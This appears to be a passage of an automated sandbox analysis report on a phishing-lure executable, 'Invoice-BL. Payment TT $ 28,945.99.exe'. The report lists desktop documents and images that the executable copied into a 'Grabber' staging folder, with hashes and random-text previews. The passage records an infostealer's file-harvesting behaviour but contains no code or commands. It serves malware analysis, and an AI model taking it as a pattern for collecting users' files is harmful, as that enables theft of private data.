Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
